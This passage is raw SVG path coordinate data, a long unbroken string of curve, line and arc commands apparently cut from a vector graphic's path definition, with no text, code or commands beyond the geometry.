.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1